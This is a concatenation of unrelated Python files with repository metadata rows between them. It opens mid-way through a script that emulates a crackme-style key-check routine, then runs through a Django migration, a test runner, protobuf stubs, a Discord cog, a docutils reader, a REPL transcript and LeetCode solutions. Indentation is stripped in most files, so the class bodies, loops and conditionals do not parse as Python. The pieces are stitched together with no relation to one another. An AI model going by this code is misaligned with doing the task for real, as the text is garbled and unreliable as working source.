data[0x04] = data[0x01] #data[0x04] = 0 0 Z3 Z4 data[0x04] = 0 0 Y3 Y4
data[0x05] = data[0x04] #data[0x05] = 0 0 Z3 Z4 data[0x05] = 0 0 Y3 Y4
data[0x04] = data[0x04] >> 0x0008 #data[0x04] = 0 0 0 Z3 data[0x04] = 0 0 0 Y3
data[0x04] &= 0x00ff
data[0x05] &= 0x00ff #data[0x05] = 0 0 0 Z4 data[0x05] = 0 0 0 Y4
data[0x0b] = data[0x05]
data[0x0b] = data[0x0b] << 0x0008 #data[0x0b] = 0 0 Z4 0 data[0x0b] = 0 0 Y4 0
data[0x0a] = data[0x07]
data[0x0a] = data[0x0a] << 0x0010 & 0xFFFFFFFF #data[0x0a] = 0 7 0 0 data[0x0a] = 0 3 0 0
data[0x0a] += data[0x0b]
data[0x0a] += data[0x04] #data[0x0a] = 0 7 Z4 Z3 data[0x0a] = 0 3 Y4 Y3
data[0x0a] += 0x1000 #data[0x0a] = 0 7 Z4 Z3 + 0x1000 data[0x0a] = 0 3 Y4 Y3
data[0x06] = get_value_from_adr(data[0x0a]) #data[0x06] = *(0 7 Z4 Z3 +0x1000 ) data[0x06] = *(0 3 Y4 Y3)
data[0x06] &= 0x00ff #data[0x06] &= 0xFF (1 byte) = X1 data[0x06] &= 0xFF
#print("")
#print("adr: %06x" % data[0x0a])
#print("data06: %02x" % data[0x06])
data[0x07] -= 1 #data[0x07] -= 1 = 6 data[0x07] -= 1 = 2
data[0x0b] = data[0x04] #data[0x0b] = 0 0 0 Z3 data[0x0b] = 0 0 0 Y3
data[0x0b] = data[0x0b] << 0x0008 #data[0x0b] = 0 0 Z3 0 data[0x0b] = 0 0 Y3 0
data[0x0a] = data[0x07]
data[0x0a] = data[0x0a] << 0x0010 & 0xFFFFFFFF #data[0x0a] = 0 6 0 0 data[0x0a] = 0 2 0 0
data[0x0a] += data[0x0b] #data[0x0a] = 0 6 Z3 0 data[0x0a] = 0 2 Y3 0
data[0x0a] += data[0x06] #data[0x0a] = 0 6 Z3 X1 data[0x0a] = 0 2 Y3 X1
data[0x0a] += 0x1000 #data[0x0a] = 0 6 Z3 X1 +0x1000 data[0x0a] = 0 2 Y3 X1
data[0x05] = get_value_from_adr(data[0x0a]) #data[0x05] = *(0 6 Z3 X1 +0x1000) data[0x05] = *(0 2 Y3 X1)
data[0x05] &= 0x00ff #data[0x05] &= 0xFF (byte) = X2 data[0x05] &= 0xFF (byte) = X2
#print("")
#print("adr: %06x" % data[0x0a])
#print("data05: %02x" % data[0x05])
if data[0x07] == 0:
data[0x07] = 0xa
data[0x07] -= 1 #data[0x07] -= 1 = 5 data[0x07] -= 1 = 1
data[0x0b] = data[0x06] #data[0x0b] = X1 data[0x0b] = X1
data[0x0b] = data[0x0b] << 0x0008 #data[0x0b] = 0 0 X1 0 data[0x0b] = 0 0 X1 0
data[0x0a] = data[0x07]
data[0x0a] = data[0x0a] << 0x0010 & 0xFFFFFFFF #data[0x0a] = 0 5 0 0 data[0x0a] = 0 1 0 0
data[0x0a] += data[0x0b] #data[0x0a] = 0 5 X1 0 data[0x0a] = 0 1 X1 0
data[0x0a] += data[0x05] #data[0x0a] = 0 5 X1 X2 data[0x0a] = 0 1 X1 X2
data[0x0a] += 0x1000 #data[0x0a] = 0 5 X1 X2 +0x10000 data[0x0a] = 0 1 X1 X2
data[0x04] = get_value_from_adr(data[0x0a]) #data[0x04] = *(0 5 X1 X2 + 0x1000) data[0x04] = *(0 1 X1 X2)
data[0x04] &= 0x00ff #data[0x04] &= 0xFF (byte) = X3 data[0x04] = X3
#print("")
#print("adr: %06x" % data[0x0a])
#print("data04: %02x" % data[0x04])
data[0x07] -= 1 #data[0x07] -= 1 = 4 data[0x07] -= 1 = 0
data[0x0b] = data[0x05] #data[0x0b] = X2 data[0x0b] = X2
data[0x0b] = data[0x0b] << 0x0008 #data[0x0b] = 0 0 X2 0 data[0x0b] = 0 0 X2 0
data[0x0a] = data[0x07]
data[0x0a] = data[0x0a] << 0x0010 & 0xFFFFFFFF #data[0x0a] = 0 4 0 0 data[0x0a] = 0 0 0 0
data[0x0a] += data[0x0b] #data[0x0a] = 0 4 X2 0 data[0x0a] = 0 0 X2 0
data[0x0a] += data[0x04] #data[0x0a] = 0 4 X2 X3 data[0x0a] = 0 0 X2 X3
data[0x0a] += 0x1000 #data[0x0a] = 0 4 X2 X3 +0x1000 data[0x0a] = 0 0 X2 X3
data[0x06] = get_value_from_adr(data[0x0a]) #data[0x06] = *(0 4 X2 X3 +0x1000) data[0x06] = *(0 0 X2 X3)
data[0x06] &= 0x00ff #data[0x06] &= 0xFF (byte) = X4 data[0x06] &= 0xFF (byte) = X4
#print("")
#print("adr: %06x" % data[0x0a])
#print("data06: %02x" % data[0x06])
if data[0x07] == 0:
data[0x07] = 0xa # data[0x07] = 0xa
data[0x07] -= 1 #data[0x07] -= 1 = 3 data[0x07] -= 1 = 9 5th time: data[0x07] = 8
data[0x09] = data[0x06] #data[0x09] = X4 data[0x09] = X4
data[0x09] = data[0x09] << 0x0008 #data[0x09] = 0 0 X4 0 data[0x09] = 0 0 X4 0
data[0x09] += data[0x04] #data[0x09] = 0 0 X4 X3 data[0x09] = 0 0 X4 X3
data[0x08] = data[0x0e] #data[0x08] = 0 0 0 1f data[0x08] = 0 0 0 1e 0 0 0 1b
data[0x08] = data[0x08] >> 0x0003 #data[0x08] = 0 0 0 7 data[0x08] = 0 0 0 7 0 0 0 6
data[0x08] &= 0x0001 #data[0x08] = 0 0 0 1 data[0x08] = 0 0 0 1 0 0 0 0
#print("debug: " + str(data[0x08]))
#010b get adr[data[0x0e]/4 - 1], const[data[0x0e]/4 - 1]
#010b: insert 0x7465622e at adr 0x100010, offset 0x0c #4
#010b: insert 0x70766766 at adr 0x100010, offset 0x08 #4
#010b: insert 0x66407279 at adr 0x100010, offset 0x04 #4
#010b: insert 0x76706e73 at adr 0x100010, offset 0x00 #4
#010b: insert 0x2e76662e at adr 0x100000, offset 0x0c #4
#010b: insert 0x666e632e at adr 0x100000, offset 0x08 #4
#010b: insert 0x6766722e at adr 0x100000, offset 0x04 #4
#010b: insert 0x612e7270 at adr 0x100000, offset 0x00 #1
if data[0x08] == 0:
#print("even")
data[0x08] = data[0x03] # data[0x08] = 0 0 Y7 Y8
data[0x03] = data[0x0e] # data[0x03] = 0 0 0 1b
data[0x03] += 0x0001 # data[0x03] = 0 0 0 1c
data[0x03] ^= data[0x00] # data[0x03] = 0 0 Y1 1c^Y2
data[0x03] ^= data[0x01] # data[0x03] = 0 0 Y1^Y3 1c^Y2^Y4
data[0x00] = data[0x09] # data[0x00] = 0 0 X4 X3
data[0x01] = data[0x02] # data[0x01] = 0 0 Y5 Y6
data[0x02] = data[0x08] # data[0x02] = 0 0 Y7 Y8
else: #data[x08] == 1
data[0x08] = data[0x00] #data[0x08] = 0 0 Z1 Z2 data[0x08] = 0 0 Y1 Y2
data[0x00] = data[0x09] #data[0x00] = 0 0 X4 X3 data[0x00] = 0 0 X4 X3
data[0x01] = data[0x0e] #data[0x01] = 0 0 0 1f data[0x01] = 0 0 0 1e
data[0x01] += 0x0001 #data[0x01] = 0 0 0 20 data[0x01] = 0 0 0 1f
data[0x01] ^= data[0x00] #data[0x01] = 0 0 X4 20^X3 data[0x01] = 0 0 X4 1f^X3
data[0x01] ^= data[0x02] #data[0x01] = 0 0 X4^Z5 20^X3^Z6 data[0x01] = 0 0 X4^Y5 1f^X3^Y6
data[0x02] = data[0x03] #data[0x02] = 0 0 Z7 Z8 data[0x02] = 0 0 Y7 Y8
data[0x03] = data[0x08] #data[0x03] = 0 0 Z1 Z2 data[0x03] = 0 0 Y1 Y2
#print("\n\n")
#print(str(32-data[0xe]) + " " + str(data[0xe]))
#print_data()
#print("DEBUG %02x %02x" % (data[0xe], data[0x7]))
security += 1
#if security == 33:
# raise Exception
data[0x00] = (data[0x00]>>8) + ((data[0x00] & 0xff)<<8)
data[0x01] = (data[0x01]>>8) + ((data[0x01] & 0xff)<<8)
data[0x01] = data[0x01] << 0x0010 & 0xFFFFFFFF
data[0x00] += data[0x01]
insert_value_at_adr(data[0x00], data[0xd])
#print("\n\n")
#print_data()
#print_sm4_data()
#raise Exception
#0159: insert 0x22926dbf (data[0x00]) at adr 0x100020 (adr pointed by data[0x0d]) <<<<
#0159: insert 0x6ffeed4d (data[0x00]) at adr 0x100028 (adr pointed by data[0x0d])
#0159: insert 0x10874ea1 (data[0x00]) at adr 0x100030 (adr pointed by data[0x0d])
#0159: insert 0x60e53499 (data[0x00]) at adr 0x100038 (adr pointed by data[0x0d])
data[0x0d] += 0x0004 #0x100024
data[0x02] = (data[0x02]>>8) + ((data[0x02] & 0xff)<<8)
data[0x03] = (data[0x03]>>8) + ((data[0x03] & 0xff)<<8)
data[0x03] = data[0x03] << 0x0010
data[0x02] += data[0x03]
insert_value_at_adr(data[0x02], data[0xd])
#print("\n\n")
#print_data()
#print_sm4_data()
#raise Exception
#016b: insert 0x4a7caf04 (data[0x02]) at adr 0x100024 (adr pointed by data[0xd]) <<<<
#016b: insert 0xd5ea9bc1 (data[0x02]) at adr 0x10002c (adr pointed by data[0xd])
#016b: insert 0x2e8e57d8 (data[0x02]) at adr 0x100034 (adr pointed by data[0xd])
#016b: insert 0xdc0bfbf0 (data[0x02]) at adr 0x10003c (adr pointed by data[0xd])
data[0x0d] += 0x0004 #0x100028
data[0x04] = data[0x0d]
data[0x0c] -= 1
data[0x0c] = 0x0010
data[0x0c] = data[0x0c] << 0x0010 & 0xFFFFFFFF #initialize data[0x0c] to 0x100000
data[0x0b] = 0x0020
data[0x0d] -= 0x0020 #set data[0x0d] to 0x100020
data[0x04] = 0x0000 #default result is set to correct
while (data[0x0b] != 0): #comparison over 32 bytes
data[0x00] = get_value_from_adr(data[0x0d]) #0x100020
data[0x00] &= 0x00ff
data[0x01] = get_value_from_adr(data[0x0c]) #0x100000 #reference key
data[0x01] &= 0x00ff
data[0x00] = abs(data[0x00] - data[0x01])
#advance offset to 01a1 since data[0x00] is not null
#comparison byte per byte
if data[0x00] != 0:
data[0x04] = 0x0001 #wrong result
else:
data[0x04] = data[0x04]
data[0x0d] += 0x0001
data[0x0c] += 0x0001
data[0x0b] -= 1
data[0x0] = data[0x04]
#deactivate for now
#if data[0x0] == 0:
# print("WIN !")
#else:
# print("LOOSE !")
#print_data()
#print_sm4_data()
print("")
loop()
print_data()
print_sm4_data()
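The emulation above repeatedly byte-swaps a 16-bit half with `(x>>8) + ((x & 0xff)<<8)`. That recurring idiom can be pulled out as a standalone helper (the name `swap16` is ours, not the script's):

```python
def swap16(x):
    # swap the two bytes of a 16-bit value, e.g. 0x1234 -> 0x3412
    return ((x >> 8) & 0xFF) | ((x & 0xFF) << 8)

swapped = swap16(0x1234)
# applying the swap twice restores the original value
roundtrip = swap16(swap16(0xBEEF))
```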

ad651f61bd321ebea386f33585e8cf5eacb6acdb | 894 | py | Python | src/data_hub/lcd/migrations/0053_alter_collectionfootprint_the_geom.py | TNRIS/api.tnris.org | 46620a4edf0682c158907f110158110801e9c398 | ["MIT"] | stars: 6 | issues: 73 | forks: null

# Generated by Django 3.2.5 on 2021-08-10 20:12
import django.contrib.gis.db.models.fields
import django.contrib.gis.geos.collections
import django.contrib.gis.geos.polygon
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('lcd', '0052_alter_collectionfootprint_the_geom'),
]
operations = [
migrations.AlterField(
model_name='collectionfootprint',
name='the_geom',
field=django.contrib.gis.db.models.fields.MultiPolygonField(default=django.contrib.gis.geos.collections.MultiPolygon(django.contrib.gis.geos.polygon.Polygon(((-107.05078125, 25.60190226111573), (-93.07617187499999, 25.60190226111573), (-93.07617187499999, 36.66841891894786), (-107.05078125, 36.66841891894786), (-107.05078125, 25.60190226111573)))), null=True, srid=4326, verbose_name='The Geometry'),
),
]

ad72b53c026f5b811aebd943c7bb216b2e4dff3e | 726 | py | Python | unittest/test_unittest_runner.py | asisudai/practical_pipeline | 09b106dc70d0d9abf7bca117346e796ad542d534 | ["MIT"] | stars: 3 | issues: null | forks: 1

#!/usr/bin/env python
import unittest
# import your test modules
import test_unittest_01
import test_unittest_02
import test_unittest_03
import test_unittest_04
if __name__ == '__main__':
# initialize the test suite
loader = unittest.TestLoader()
suite = unittest.TestSuite()
# add tests to the test suite
suite.addTests(loader.loadTestsFromModule(test_unittest_01))
suite.addTests(loader.loadTestsFromModule(test_unittest_02))
suite.addTests(loader.loadTestsFromModule(test_unittest_03))
suite.addTests(loader.loadTestsFromModule(test_unittest_04))
# initialize a runner, pass it your suite and run it
runner = unittest.TextTestRunner(verbosity=3)
result = runner.run(suite)
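The same loader/suite/runner pattern in miniature, with an inline test case standing in for the imported modules (verbosity is lowered here just to keep output quiet):

```python
import unittest

class SampleTest(unittest.TestCase):
    def test_addition(self):
        self.assertEqual(1 + 1, 2)

# build a suite by hand, mirroring the runner above
loader = unittest.TestLoader()
suite = unittest.TestSuite()
suite.addTests(loader.loadTestsFromTestCase(SampleTest))

# run it and keep the result object for inspection
runner = unittest.TextTestRunner(verbosity=0)
result = runner.run(suite)
```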

ad88dd61bbd09019864be52cbe4cf8c91fba88d8 | 337 | py | Python | accelerator/models/ethno_racial_identity.py | masschallenge/django-accelerator | 8af898b574be3b8335edc8961924d1c6fa8b5fd5 | ["MIT"] | stars: 6 | issues: 160 | forks: null

import swapper
from accelerator_abstract.models.base_ethno_racial_identity import (
BaseEthnoRacialIdentity,
)
class EthnoRacialIdentity(BaseEthnoRacialIdentity):
class Meta(BaseEthnoRacialIdentity.Meta):
swappable = swapper.swappable_setting(
BaseEthnoRacialIdentity.Meta.app_label, 'EthnoRacialIdentity')
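`swapper.swappable_setting` derives the Django setting name that controls which concrete model is used. A rough sketch of that naming convention (this mirrors the convention only; it is not the swapper package itself):

```python
def swappable_setting(app_label, model):
    # swapper-style setting name, e.g. "ACCELERATOR_ETHNORACIALIDENTITY";
    # assumption: the convention is upper-cased "<APP_LABEL>_<MODEL>"
    return "{}_{}".format(app_label.upper(), model.upper())

setting = swappable_setting("accelerator", "EthnoRacialIdentity")
```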

ad93a1fe02a22cf958094f14b1d5c32570598491 | 318 | py | Python | src/test.py | qitar888/ga2016_final_project | f573f683cc2b5cb73a863f3e83f90fc3ced6454a | ["MIT"] | stars: null | issues: null | forks: null

import cost_function as cf
import pic
target_image = pic.pic2rgb("../data/img03.jpg", 50, 50)
cf.set_target_image(target_image)
s = "(H 0.73 (V 0.451 (H 0.963 (L color)(L color))(V 0.549 (L color)(L color)))(L color))"
matrix = cf.to_array(s, 50, 50, 1)
#print(matrix)
pic.rgb2pic(matrix, 'LAB', "./master_piece.png")
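The layout string passed to `cf.to_array` is an s-expression of `H`/`V` splits with ratios and `L` leaves. A minimal tokenizer for that grammar (the helper is ours; the real parsing lives in `cost_function`):

```python
import re

def tokenize(expr):
    # split into parens and atoms, e.g. "(H 0.73 (L color))" ->
    # ['(', 'H', '0.73', '(', 'L', 'color', ')', ')']
    return re.findall(r"[()]|[^\s()]+", expr)

tokens = tokenize("(H 0.73 (L color)(L color))")
```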

ad974a16f5e2eba5c65ce3b727dca372dec76010 | 1353 | py | Python | cloudkittyclient/v1/info.py | mmariani/python-cloudkittyclient | 92f51ded48b261231f226669f75c52f199584d5c | ["Apache-2.0"] | stars: null | issues: null | forks: null

# -*- coding: utf-8 -*-
# Copyright 2018 Objectif Libre
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from cloudkittyclient.v1 import base
class InfoManager(base.BaseManager):
"""Class used to handle /v1/info endpoint"""
url = '/v1/info/{endpoint}/{metric_name}'
def get_metric(self, **kwargs):
"""Returns info for the given service.
If metric_name is not specified, returns info for all services.
:param metric_name: Name of the service on which you want information
:type metric_name: str
"""
url = self.get_url('metrics', kwargs)
return self.api_client.get(url).json()
def get_config(self, **kwargs):
"""Returns the current configuration."""
url = self.get_url('config', kwargs)
return self.api_client.get(url).json()
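`get_url` is inherited from `base.BaseManager`, which is outside this module, so its exact behavior is not shown here. One plausible way such a template is filled while tolerating missing keys (a sketch, not the client's actual implementation):

```python
class SafeDict(dict):
    # leave missing template fields empty instead of raising KeyError
    def __missing__(self, key):
        return ""

URL = "/v1/info/{endpoint}/{metric_name}"
# metric_name is omitted here, so it renders as an empty segment
url = URL.format_map(SafeDict(endpoint="metrics"))
```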

ad9d9fb7a38ac292e01525e196638ba0f6d199ab | 2303 | py | Python | pyatv/protocols/mrp/protobuf/PlayerClientPropertiesMessage_pb2.py | crxporter/pyatv | e694a210b3810c64044116bf40e7b75420b5fe75 | ["MIT"] | stars: null | issues: null | forks: null

# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: pyatv/protocols/mrp/protobuf/PlayerClientPropertiesMessage.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import descriptor_pool as _descriptor_pool
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from pyatv.protocols.mrp.protobuf import ProtocolMessage_pb2 as pyatv_dot_protocols_dot_mrp_dot_protobuf_dot_ProtocolMessage__pb2
from pyatv.protocols.mrp.protobuf import PlayerPath_pb2 as pyatv_dot_protocols_dot_mrp_dot_protobuf_dot_PlayerPath__pb2
DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n@pyatv/protocols/mrp/protobuf/PlayerClientPropertiesMessage.proto\x1a\x32pyatv/protocols/mrp/protobuf/ProtocolMessage.proto\x1a-pyatv/protocols/mrp/protobuf/PlayerPath.proto\"^\n\x1dPlayerClientPropertiesMessage\x12\x1f\n\nplayerPath\x18\x01 \x01(\x0b\x32\x0b.PlayerPath\x12\x1c\n\x14lastPlayingTimestamp\x18\x02 \x01(\x01:W\n\x1dplayerClientPropertiesMessage\x12\x10.ProtocolMessage\x18V \x01(\x0b\x32\x1e.PlayerClientPropertiesMessage')
PLAYERCLIENTPROPERTIESMESSAGE_FIELD_NUMBER = 86
playerClientPropertiesMessage = DESCRIPTOR.extensions_by_name['playerClientPropertiesMessage']
_PLAYERCLIENTPROPERTIESMESSAGE = DESCRIPTOR.message_types_by_name['PlayerClientPropertiesMessage']
PlayerClientPropertiesMessage = _reflection.GeneratedProtocolMessageType('PlayerClientPropertiesMessage', (_message.Message,), {
'DESCRIPTOR' : _PLAYERCLIENTPROPERTIESMESSAGE,
'__module__' : 'pyatv.protocols.mrp.protobuf.PlayerClientPropertiesMessage_pb2'
# @@protoc_insertion_point(class_scope:PlayerClientPropertiesMessage)
})
_sym_db.RegisterMessage(PlayerClientPropertiesMessage)
if _descriptor._USE_C_DESCRIPTORS == False:
pyatv_dot_protocols_dot_mrp_dot_protobuf_dot_ProtocolMessage__pb2.ProtocolMessage.RegisterExtension(playerClientPropertiesMessage)
DESCRIPTOR._options = None
_PLAYERCLIENTPROPERTIESMESSAGE._serialized_start=167
_PLAYERCLIENTPROPERTIESMESSAGE._serialized_end=261
# @@protoc_insertion_point(module_scope)
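The extension above is registered on field number 86; on the wire, a length-delimited field with that number carries the tag `(86 << 3) | 2`, varint-encoded. A small sketch of protobuf base-128 varint encoding (standalone, independent of the generated module):

```python
def encode_varint(n):
    # protobuf base-128 varint: 7 bits per byte, least-significant group
    # first, high bit set on every byte except the last
    out = bytearray()
    while True:
        byte = n & 0x7F
        n >>= 7
        if n:
            out.append(byte | 0x80)
        else:
            out.append(byte)
            return bytes(out)

tag = (86 << 3) | 2  # field 86, wire type 2 (length-delimited)
encoded_tag = encode_varint(tag)
```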

ad9e41e35c13ed20157dba440d5e3dc168b4b9c8 | 524 | py | Python | app_challenges_sections_units/migrations/0036_auto_20190619_1903.py | Audiotuete/backend_wagtail_api | 3c5a4a610ffdbb75d45a57fc670e2ae3b7178c62 | ["MIT"] | stars: null | issues: null | forks: null

# Generated by Django 2.0.8 on 2019-06-19 19:03
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('wagtailimages', '0001_squashed_0021'),
('app_challenges_sections_units', '0035_auto_20190619_1847'),
]
operations = [
migrations.RenameModel(
old_name='Slideshow',
new_name='Gallery',
),
migrations.RenameModel(
old_name='SlideshowImage',
new_name='GalleryImage',
),
]

a8ebf8bbb141395df211d1beccebe31440e682f7 | 109 | py | Python | chk.py | benhur98/GazeUI_RH3 | 3e633474bcb78ab30897692fbcb75c8ad1f5c92e | ["MIT"] | stars: null | issues: null | forks: null

import numpy as np
a=np.load("train-data-{}.npy".format(input()))
while True:
print(a[int(input())][1])
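`.npy` files holding mixed records like `train-data-*.npy` are typically object arrays; since NumPy 1.16.3, loading those requires `allow_pickle=True`. A self-contained round trip (the file name below is a stand-in, not the actual training data):

```python
import os
import tempfile
import numpy as np

# an object array: each record pairs an image-like blob with a label
arr = np.empty(1, dtype=object)
arr[0] = [np.zeros((2, 2)), 1]

with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, "train-data-demo.npy")
    np.save(path, arr)
    # object arrays need allow_pickle=True on load
    loaded = np.load(path, allow_pickle=True)
    label = loaded[0][1]
```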

a8f571492f94df0b230565b81e8284f0b4160ad7 | 1994 | py | Python | cogs/StatCollector.py | galaxyAbstractor/rvnBot | a013b92c924cc218811e801680bf7d4318406a4c | ["MIT"] | stars: null | issues: null | forks: null

from discord import TextChannel
from discord.ext import commands
from stats import StatService
from users import UserService
class StatCollector(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.stats = StatService(bot.pool)
self.users = UserService(bot.pool)
@commands.Cog.listener()
async def on_message(self, message):
if message.author == self.bot.user:
return
if not isinstance(message.channel, TextChannel):
return
await self.stats.handle_message_stat(message)
@commands.Cog.listener()
async def on_typing(self, channel, user, when):
if user == self.bot.user:
return
if not isinstance(channel, TextChannel):
return
@commands.Cog.listener()
async def on_raw_message_delete(self, payload):
message = payload.cached_message
return
@commands.Cog.listener()
async def on_raw_bulk_message_delete(self, payload):
messages = payload.cached_messages
return
@commands.Cog.listener()
async def on_raw_message_edit(self, payload):
        message = payload.cached_message
return
@commands.Cog.listener()
async def on_reaction_add(self, reaction, user):
return
@commands.Cog.listener()
async def on_reaction_remove(self, reaction, user):
return
@commands.Cog.listener()
async def on_member_join(self, member):
return
@commands.Cog.listener()
async def on_member_remove(self, member):
return
@commands.Cog.listener()
async def on_member_update(self, member):
return
@commands.Cog.listener()
async def on_user_update(self, user):
return
@commands.Cog.listener()
async def on_member_ban(self, guild, user):
return
@commands.Cog.listener()
async def on_member_unban(self, guild, user):
return
def setup(bot):
bot.add_cog(StatCollector(bot))

a8fcc6ac8aab4f48607db30ce376a669495d6728 | 229 | py | Python | lorem/data.py | Ahsoka/python-lorem | 5252a5819fcdf87955794a4f1d06284d152e2c8a | ["MIT"] | stars: 21 | issues: null | forks: 10

# Note: the adjacent string literals below are concatenated with no separating
# space, so split() yields the joined words "etincidunt" and "quiquia" --
# a quirk of this word list, preserved as-is.
WORDS = ("adipisci aliquam amet consectetur dolor dolore dolorem eius est et"
"incidunt ipsum labore magnam modi neque non numquam porro quaerat qui"
"quia quisquam sed sit tempora ut velit voluptatem").split()
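A sketch of how such a word list is typically consumed. Here the literals carry trailing spaces so every word stays separate, and the `sentence` helper is ours, not part of this module:

```python
import random

WORDS = ("adipisci aliquam amet consectetur dolor dolore dolorem eius est et "
         "incidunt ipsum labore magnam modi neque non numquam porro quaerat qui "
         "quia quisquam sed sit tempora ut velit voluptatem").split()

def sentence(rng, n=6):
    # draw n words and shape them into a capitalized sentence
    words = [rng.choice(WORDS) for _ in range(n)]
    return " ".join(words).capitalize() + "."

# a seeded RNG makes the output reproducible
text = sentence(random.Random(0))
```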

a8fdf92716ffae4bc0c6399c929dc082d01dc0eb | 886 | py | Python | motto/readers.py | attakei/jamproject | f3a677f4f95c112b89fb38957e6ba1a3c923ea85 | ["Apache-2.0"] | stars: null | issues: 1 | forks: null

"""Core custom readers for docutils
"""
from typing import List, Type
from docutils import readers
from docutils.transforms import Transform
from .skill import SkillBase
from .transforms import InitializeReportTransform, TokenizeTransform
class Reader(readers.Reader):
"""Basic custom reader class.
Includes
- Tokenize transform
- Skills
"""
def __init__(self, parser=None, parser_name=None):
super().__init__(parser=parser, parser_name=parser_name)
self._skills: List[SkillBase] = []
def add_skill(self, skill: SkillBase):
self._skills.append(skill)
def get_transforms(self) -> List[Type[Transform]]:
"""Return all transforms.
"""
transforms = super().get_transforms()
transforms += [TokenizeTransform, InitializeReportTransform]
transforms += self._skills
return transforms

d10f214ef69fa8548dfc5cc8ae64127b9968d418 | 376 | py | Python | tests/bitly/*REPL* [python].py | goldsborough/lnk | 1487d272a70329571c77c0ec17c394dc6a1d088f | ["MIT"] | stars: 3 | issues: 2 | forks: 1

Python 3.5.0 (default, Sep 14 2015, 02:37:27)
[GCC 4.2.1 Compatible Apple LLVM 6.1.0 (clang-602.0.53)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> a = [{'a': 1}, {'b': 2}]
>>> sorted(a)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: unorderable types: dict() < dict()
>>> b = [{'b': 2}, {'a': 1}]
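The `TypeError` in the transcript is expected Python 3 behavior: dicts have no defined ordering, so `sorted` needs an explicit `key`. For example:

```python
a = [{'b': 2}, {'a': 1}]
# sort by each dict's smallest key instead of comparing dicts directly
ordered = sorted(a, key=lambda d: min(d))
```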

d112e5e4e9404a987fd2539dd0c5729a2d97741e | 210 | py | Python | app/events/client/commands/template.py | Hacker-1202/Selfium | 7e798c23c9f24aacab6f6a485d6355f1045bc65c | ["MIT"] | stars: 14 | issues: 2 | forks: 5

from app.vars.client import client
from app.helpers import Notify, params
from app.filesystem import cfg
@client.command()
async def template(ctx):
notify = Notify(ctx=ctx, title='Template File...')

d123ae3da1f9bbc3e25f9668062bd9940c2f2120 | 991 | py | Python | inkcut-master/inkcut/device/protocols/debug.py | ilnanny/Inkscape-addons | a30cdde2093fa2da68b90213e057519d0304433f | ["X11"] | stars: 3 | issues: null | forks: null

# -*- coding: utf-8 -*-
'''
Created on Oct 23, 2015
@author: jrm
'''
from inkcut.device.plugin import DeviceProtocol
from inkcut.core.utils import async_sleep, log
class DebugProtocol(DeviceProtocol):
""" A protocol that just logs what is called """
def connection_made(self):
log.debug("protocol.connectionMade()")
def move(self, x, y, z, absolute=True):
log.debug("protocol.move({x},{y},{z})".format(x=x, y=y, z=z))
#: Wait some time before we get there
return async_sleep(0.1)
def set_pen(self, p):
log.debug("protocol.set_pen({p})".format(p=p))
def set_velocity(self, v):
log.debug("protocol.set_velocity({v})".format(v=v))
def set_force(self, f):
log.debug("protocol.set_force({f})".format(f=f))
def data_received(self, data):
log.debug("protocol.data_received({}".format(data))
def connection_lost(self):
log.debug("protocol.connection_lost()") | 29.147059 | 69 | 0.619576 | 140 | 991 | 4.292857 | 0.457143 | 0.093178 | 0.186356 | 0.094842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011613 | 0.217962 | 991 | 34 | 70 | 29.147059 | 0.763871 | 0.139253 | 0 | 0 | 0 | 0 | 0.205006 | 0.205006 | 0 | 0 | 0 | 0 | 0 | 1 | 0.388889 | false | 0 | 0.111111 | 0 | 0.611111 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d1308da11d5da22dc10b14287bdad38de1760631 | 1,466 | py | Python | Python3/537.py | rakhi2001/ecom7 | 73790d44605fbd51e8f7e804b9808e364fcfc680 | [
"MIT"
] | 854 | 2018-11-09T08:06:16.000Z | 2022-03-31T06:05:53.000Z | Python3/537.py | rakhi2001/ecom7 | 73790d44605fbd51e8f7e804b9808e364fcfc680 | [
"MIT"
] | 29 | 2019-06-02T05:02:25.000Z | 2021-11-15T04:09:37.000Z | Python3/537.py | rakhi2001/ecom7 | 73790d44605fbd51e8f7e804b9808e364fcfc680 | [
"MIT"
] | 347 | 2018-12-23T01:57:37.000Z | 2022-03-12T14:51:21.000Z | __________________________________________________________________________________________________
sample 24 ms submission
class Solution:
    def complexNumberMultiply(self, a: str, b: str) -> str:
        A = [int(x) for x in a.replace('i','').split('+')]
        B = [int(x) for x in b.replace('i','').split('+')]
        return str(A[0]*B[0]-A[1]*B[1])+'+'+str(A[0]*B[1]+A[1]*B[0])+'i'
__________________________________________________________________________________________________
sample 13124 kb submission
class Solution:
    def getrc(self, strs):
        val = ''
        r, c = 0, 0
        positive = True
        for char in strs:
            if char == '-':
                positive = False
            elif char != '+' and char != 'i':
                val += char
            else:
                val = int(val)
                if not positive: val = -val
                if char == '+': r = val
                else: c = val
                val = ''
                positive = True
        return (r, c)

    def complexNumberMultiply(self, a: str, b: str) -> str:
        ra, ca = self.getrc(a)
        rb, cb = self.getrc(b)
        r = ra*rb-ca*cb
        c = ra*cb+rb*ca
        if r >= 0: r = str(r)
        else: r = '-' + str(-r)
        if c >= 0: c = str(c)
        else: c = '-' + str(-c)
        return r + '+' + c + 'i'
__________________________________________________________________________________________________
